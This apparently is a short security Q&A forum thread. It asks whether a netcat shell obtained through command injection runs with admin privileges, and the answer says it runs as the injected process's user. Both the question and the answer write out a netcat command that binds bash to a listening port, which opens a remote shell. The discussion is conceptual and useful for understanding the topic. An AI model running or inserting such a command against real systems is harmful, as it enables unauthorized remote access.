1

I have a question about privileges when performing an Operating system command injection.

If an attacker succeeds in getting a reverse shell on a remote server through netcat (netcat -v -e '/bin/bash' -l -p 5550), does he/she have admin privileges on the victim machine or some sort of escalation is needed?

thanks

user1990170
  • 35
  • 4

1 Answers1

1

Usually, you need some sort of escalation.

If you can run the command netcat -v -e '/bin/bash' -l -p 5550 all you've done (effectively) is have the remote machine open a port for you as the user that was running whatever process ran the command. That is to say, if you managed to inject your netcat command into a www process, you are likely logged in as the 'www' user, and not (if the remote machine has been remotely secured) as root.

Bob Watson
  • 2,856
  • 19
  • 29
  • Thanks, so it all depends on the target machine ...so getting a reverse shell doesn't mean that everything is ok..in most cases I believe that getting access to files on the server is no mean achievement..am I right? – user1990170 Feb 10 '13 at 10:25
  • Yeah - once you have a user shell you can start poking around for other things, and it may be more likely on a machine with at least one major hole that you may find a local escalation you can use. – Bob Watson Feb 10 '13 at 10:31